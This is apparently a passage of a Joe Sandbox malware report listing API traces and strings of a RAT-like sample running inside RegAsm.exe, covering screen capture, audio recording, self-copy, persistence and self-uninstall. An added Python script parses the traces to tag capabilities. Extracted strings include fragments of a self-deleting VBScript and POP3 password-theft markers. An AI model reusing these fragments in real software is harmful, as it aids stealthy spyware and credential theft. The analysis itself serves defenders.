                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: InfoLocale
                                                • String ID:
                                                • API String ID: 2299586839-0
                                                • Opcode ID: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                                • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                                                • Opcode Fuzzy Hash: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                                • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1
                                                APIs
                                                • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418ECB
                                                • CreateCompatibleDC.GDI32(00000000), ref: 00418ED8
                                                  • Part of subcall function 00419360: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419390
                                                • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F4E
                                                • DeleteDC.GDI32(00000000), ref: 00418F65
                                                • DeleteDC.GDI32(00000000), ref: 00418F68
                                                • DeleteObject.GDI32(00000000), ref: 00418F6B
                                                • SelectObject.GDI32(00000000,00000000), ref: 00418F8C
                                                • DeleteDC.GDI32(00000000), ref: 00418F9D
                                                • DeleteDC.GDI32(00000000), ref: 00418FA0
                                                • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418FC4
                                                • GetCursorInfo.USER32(?), ref: 00418FE2
                                                • GetIconInfo.USER32 ref: 00418FF8
                                                • DeleteObject.GDI32(?), ref: 00419027
                                                • DeleteObject.GDI32(?), ref: 00419034
                                                • DrawIcon.USER32(00000000,?,?,?), ref: 00419041
                                                • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 00419077
                                                • GetObjectA.GDI32(00000000,00000018,?), ref: 004190A3
                                                • LocalAlloc.KERNEL32(00000040,00000001), ref: 00419110
                                                • GlobalAlloc.KERNEL32(00000000,?), ref: 0041917F
                                                • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004191A3
                                                • DeleteDC.GDI32(?), ref: 004191B7
                                                • DeleteDC.GDI32(00000000), ref: 004191BA
                                                • DeleteObject.GDI32(00000000), ref: 004191BD
                                                • GlobalFree.KERNEL32(?), ref: 004191C8
                                                • DeleteObject.GDI32(00000000), ref: 0041927C
                                                • GlobalFree.KERNEL32(?), ref: 00419283
                                                • DeleteDC.GDI32(?), ref: 00419293
                                                • DeleteDC.GDI32(00000000), ref: 0041929E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIconInfo$BitmapBitsCursorDisplayDrawEnumLocalSelectSettingsStretch
                                                • String ID: DISPLAY
                                                • API String ID: 4256916514-865373369
                                                • Opcode ID: dfe77fb2dceb0fbb205aabf54f767b908c25502d30906bbb63463b6629d02dd1
                                                • Instruction ID: e1b8f987aa81746083de8242de432fb1856ba331ec6d7e725e66c1191a76d441
                                                • Opcode Fuzzy Hash: dfe77fb2dceb0fbb205aabf54f767b908c25502d30906bbb63463b6629d02dd1
                                                • Instruction Fuzzy Hash: 64C14C71504301AFD720DF25DC48BABBBE9EB88715F04482EF98993291DB34ED45CB6A
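The function above is a textbook GDI screenshot routine: CreateDCA("DISPLAY") and CreateCompatibleDC/CreateCompatibleBitmap set up an off-screen bitmap, StretchBlt/BitBlt copy the desktop into it, GetCursorInfo/GetIconInfo/DrawIcon paint the mouse cursor into the frame, and GetDIBits pulls the pixel data out for exfiltration. Reading capabilities off these API sets by hand is what an analyst does with every block on this page. The following is an added example, not Joe Sandbox, capa or Remcos code: it parses the report's "Name.MODULE(args), ref: ADDR" bullet format and tags a function's API set against a small rule table. The rule table and capability names are this example's own assumptions; the two sample traces are copied verbatim from this block and from the uninstall block that follows it.

```python
"""Capability tagging over a Joe Sandbox per-function API trace.

Added example for this report; not Joe Sandbox, capa or Remcos code.  The rule
table is this example's own heuristic (an assumption), modelled on the GDI
screenshot and uninstall traces on this page.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Set, Tuple

# One bullet of the trace.  Arguments stay raw: the report prints unresolved
# values as "?" and string arguments without quotes.
LINE_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
HEX_ARG_RE = re.compile(r"^[0-9A-Fa-f]{8}$")


@dataclass(frozen=True)
class Call:
    api: str
    module: str
    args: Tuple[str, ...]
    ref: int                    # address of the call instruction
    subcall_of: Optional[int]   # callee address when marked "Part of subcall"


def parse_trace(text: str) -> List[Call]:
    """Parse the bullets of one function block; lines that do not match are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        # Naive comma split: acceptable because the report does not quote strings,
        # so a string argument containing a comma would be split as well.
        args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] else ()
        sub = int(m["sub"], 16) if m["sub"] else None
        calls.append(Call(m["api"], m["mod"], args, int(m["ref"], 16), sub))
    return calls


# (capability, APIs that must all be present, APIs of which at least one must be present)
RULES = [
    ("gdi-screen-capture",
     {"CreateCompatibleDC", "CreateCompatibleBitmap", "GetDIBits"}, {"BitBlt", "StretchBlt"}),
    ("cursor-overlay-in-capture",
     {"GetCursorInfo", "GetIconInfo", "DrawIcon"}, set()),
    ("self-uninstall-via-launched-file",
     {"GetModuleFileNameW", "RegDeleteKeyA", "SetFileAttributesW", "ShellExecuteW", "ExitProcess"}, set()),
    ("tears-down-hooks-and-threads",
     {"UnhookWindowsHookEx", "TerminateThread"}, set()),
]


def tag_capabilities(calls: List[Call], include_subcalls: bool = True) -> List[str]:
    """Sorted capability names whose API requirements the trace satisfies."""
    apis: Set[str] = {c.api for c in calls if include_subcalls or c.subcall_of is None}
    return sorted(name for name, need_all, need_any in RULES
                  if need_all <= apis and (not need_any or apis & need_any))


def string_args(calls: List[Call]) -> List[str]:
    """Arguments the report resolved to strings (anything that is not hex or '?')."""
    return sorted({a for c in calls for a in c.args if a and a != "?" and not HEX_ARG_RE.match(a)})


# Bullets copied from the screenshot function block of this report.
SCREENSHOT_TRACE = """
• CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418ECB
• CreateCompatibleDC.GDI32(00000000), ref: 00418ED8
  • Part of subcall function 00419360: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419390
• CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F4E
• StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418FC4
• GetCursorInfo.USER32(?), ref: 00418FE2
• GetIconInfo.USER32 ref: 00418FF8
• DrawIcon.USER32(00000000,?,?,?), ref: 00419041
• BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 00419077
• GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004191A3
"""

# Bullets copied from the uninstall function block that follows it.
UNINSTALL_TRACE = """
  • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
• GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D558
• RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D56B
• SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D584
  • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,004752D8,004752F0,?,pth_unenc), ref: 0040B8F6
  • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32 ref: 0040B902
• ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D7FF
• ExitProcess.KERNEL32 ref: 0040D80B
"""

if __name__ == "__main__":
    for name, trace in (("screenshot", SCREENSHOT_TRACE), ("uninstall", UNINSTALL_TRACE)):
        calls = parse_trace(trace)
        print(name, len(calls), tag_capabilities(calls), string_args(calls))
```

Note the `include_subcalls` switch: the report folds APIs of callees into a block as "Part of subcall function", so a rule that needs TerminateThread/UnhookWindowsHookEx only fires when those inherited calls are counted. Decide deliberately which view you want before comparing blocks across samples.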
                                                APIs
                                                  • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                  • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D558
                                                • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D56B
                                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D584
                                                • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D5B4
                                                  • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,004752D8,004752F0,?,pth_unenc), ref: 0040B8F6
                                                  • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32 ref: 0040B902
                                                  • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                  • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D7FF
                                                • ExitProcess.KERNEL32 ref: 0040D80B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                • String ID: """, 0$")$8SG$@qF$@qF$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                • API String ID: 1861856835-1447701601
                                                • Opcode ID: d8e98d1fd2f1bdc760dae9a559abea4cd274c949fa03be3778951f2c3f1c4be1
                                                • Instruction ID: 9f807323933333198641953f201c1fc8368d74e19fdabe041c5449f7db564f80
                                                • Opcode Fuzzy Hash: d8e98d1fd2f1bdc760dae9a559abea4cd274c949fa03be3778951f2c3f1c4be1
                                                • Instruction Fuzzy Hash: 8791B0716082005AC315FB62D8529AF77A8AFD4309F10443FB64AA71E3EF7C9D49C65E
                                                APIs
                                                  • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                  • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E0
                                                • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1F3
                                                • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D223
                                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D232
                                                  • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,004752D8,004752F0,?,pth_unenc), ref: 0040B8F6
                                                  • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32 ref: 0040B902
                                                  • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                  • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,68491986,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D44D
                                                • ExitProcess.KERNEL32 ref: 0040D454
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("$xpF
                                                • API String ID: 3797177996-2483056239
                                                • Opcode ID: 9f8aff639c038808ac3b2befcd98474336a74f9fecab3a97dc503a806b773c90
                                                • Instruction ID: f7f00373e35faeae073ffedb9d5543756e5675edee5c5b567d0d61755fae189b
                                                • Opcode Fuzzy Hash: 9f8aff639c038808ac3b2befcd98474336a74f9fecab3a97dc503a806b773c90
                                                • Instruction Fuzzy Hash: 6181AF716082405AC315FB62D8529AF77A8AFD0308F10483FB58A671E3EF7C9E49C65E
                                                APIs
                                                • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 004124CF
                                                • ExitProcess.KERNEL32(00000000), ref: 004124DB
                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00412555
                                                • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412564
                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041256F
                                                • CloseHandle.KERNEL32(00000000), ref: 00412576
                                                • GetCurrentProcessId.KERNEL32 ref: 0041257C
                                                • PathFileExistsW.SHLWAPI(?), ref: 004125AD
                                                • GetTempPathW.KERNEL32(00000104,?), ref: 00412610
                                                • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 0041262A
                                                • lstrcatW.KERNEL32(?,.exe), ref: 0041263C
                                                  • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
                                                • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041267C
                                                • Sleep.KERNEL32(000001F4), ref: 004126BD
                                                • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004126D2
                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126DD
                                                • CloseHandle.KERNEL32(00000000), ref: 004126E4
                                                • GetCurrentProcessId.KERNEL32 ref: 004126EA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                                • String ID: .exe$8SG$WDH$exepath$open$temp_
                                                • API String ID: 2649220323-436679193
                                                • Opcode ID: 1b3fed83da2aab5ae681b9012af93f6771012d14136d86493a6b51ff35766dc4
                                                • Instruction ID: ea0e71dbd1735df2f0ffa6a76a18ae54bfb239dee3d1740714ca762960b89f4c
                                                • Opcode Fuzzy Hash: 1b3fed83da2aab5ae681b9012af93f6771012d14136d86493a6b51ff35766dc4
                                                • Instruction Fuzzy Hash: 4C51C871A00215BBDB10ABA09C99EFE336D9B04715F1041ABF501E71D2EF7C8E858A5D
                                                APIs
                                                • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B1CD
                                                • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B1E1
                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660B4), ref: 0041B209
                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0041B21F
                                                • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B260
                                                • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B278
                                                • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B28D
                                                • SetEvent.KERNEL32 ref: 0041B2AA
                                                • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B2BB
                                                • CloseHandle.KERNEL32 ref: 0041B2CB
                                                • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B2ED
                                                • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B2F7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                                • API String ID: 738084811-2094122233
                                                • Opcode ID: d2db031e3b1df8eedd793174f912beb473d8d97f533f0dd4154628810b81d940
                                                • Instruction ID: 904a2ea9ee052b7cd0d2885f28b370526ea16529c5f4723dacad6ab52bd59ce6
                                                • Opcode Fuzzy Hash: d2db031e3b1df8eedd793174f912beb473d8d97f533f0dd4154628810b81d940
                                                • Instruction Fuzzy Hash: 015193B12842056ED314B731DC96ABF779CDB80359F10053FB246621E2EF789D498AAE
                                                APIs
                                                • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                                                • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                                                • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                                                • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                                                • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                                                • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                                                • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                                                • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                                                • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                                                • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                                                • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                                                • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                                                • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$Write$Create
                                                • String ID: RIFF$WAVE$data$fmt
                                                • API String ID: 1602526932-4212202414
                                                • Opcode ID: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                                                • Instruction ID: e437df56db769974f3bb03b9acf3047b6271bea3308615ff466a61b001f8e6b8
                                                • Opcode Fuzzy Hash: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                                                • Instruction Fuzzy Hash: D1413F72644218BAE210DB51DD85FBB7FECEB89B50F40441AFA44D60C0E7A5E909DBB3
                                                APIs
                                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000001,00407688,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000003,004076B0,004752D8,00407709), ref: 004072BF
                                                • GetProcAddress.KERNEL32(00000000), ref: 004072C8
                                                • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072DD
                                                • GetProcAddress.KERNEL32(00000000), ref: 004072E0
                                                • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072F1
                                                • GetProcAddress.KERNEL32(00000000), ref: 004072F4
                                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00407305
                                                • GetProcAddress.KERNEL32(00000000), ref: 00407308
                                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 00407319
                                                • GetProcAddress.KERNEL32(00000000), ref: 0040731C
                                                • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040732D
                                                • GetProcAddress.KERNEL32(00000000), ref: 00407330
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressHandleModuleProc
                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                • API String ID: 1646373207-255920310
                                                • Opcode ID: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                                                • Instruction ID: 405170eedd050388d8f538cead316ce70cca9a1d875d15a5a69166cce564cbe9
                                                • Opcode Fuzzy Hash: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                                                • Instruction Fuzzy Hash: 0A0152A0E4431676D711AF7AAC44D577E9D9E41351311487BB405E2292EEBCE800CD6E
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID: _strlen
                                                • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                • API String ID: 4218353326-3023110444
                                                • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                • Instruction ID: bb93a2ec4ecc4c0c7ac40ef0fbf5621e946fdf476ba73097d2750e43d9e064ca
                                                • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                • Instruction Fuzzy Hash: 69612475D04218ABFF11CBE4C851BDEB7F9EF45280F00409AE604A7299EF706A45CF96
                                                APIs
                                                • _wcslen.LIBCMT ref: 0040CE42
                                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE5B
                                                • CopyFileW.KERNEL32 ref: 0040CF0B
                                                • _wcslen.LIBCMT ref: 0040CF21
                                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CFA9
                                                • CopyFileW.KERNEL32 ref: 0040CFBF
                                                • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFFE
                                                • _wcslen.LIBCMT ref: 0040D001
                                                • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040D018
                                                • CloseHandle.KERNEL32 ref: 0040D068
                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000001), ref: 0040D086
                                                • ExitProcess.KERNEL32 ref: 0040D09D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$del$open
                                                • API String ID: 1579085052-2309681474
                                                • Opcode ID: e23ef020428c66d53fd8e3c33b5503753ae814959289fe9288ddeebf21de7c0a
                                                • Instruction ID: 98553dc1b0994f0aa09194d7cf3a18af63584d9ff732256a229fdfb73b573f5c
                                                • Opcode Fuzzy Hash: e23ef020428c66d53fd8e3c33b5503753ae814959289fe9288ddeebf21de7c0a
                                                • Instruction Fuzzy Hash: 3151E820208302ABD615B7359C92A6F679D9F8471DF00443FF60AA61E3EF7C9D05866E
                                                APIs
                                                • lstrlenW.KERNEL32(?), ref: 0041C0C7
                                                • _memcmp.LIBVCRUNTIME ref: 0041C0DF
                                                • lstrlenW.KERNEL32(?), ref: 0041C0F8
                                                • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C133
                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C146
                                                • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C18A
                                                • lstrcmpW.KERNEL32(?,?), ref: 0041C1A5
                                                • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C1BD
                                                • _wcslen.LIBCMT ref: 0041C1CC
                                                • FindVolumeClose.KERNEL32(?), ref: 0041C1EC
                                                • GetLastError.KERNEL32 ref: 0041C204
                                                • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C231
                                                • lstrcatW.KERNEL32(?,?), ref: 0041C24A
                                                • lstrcpyW.KERNEL32(?,?), ref: 0041C259
                                                • GetLastError.KERNEL32 ref: 0041C261
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                • String ID: ?
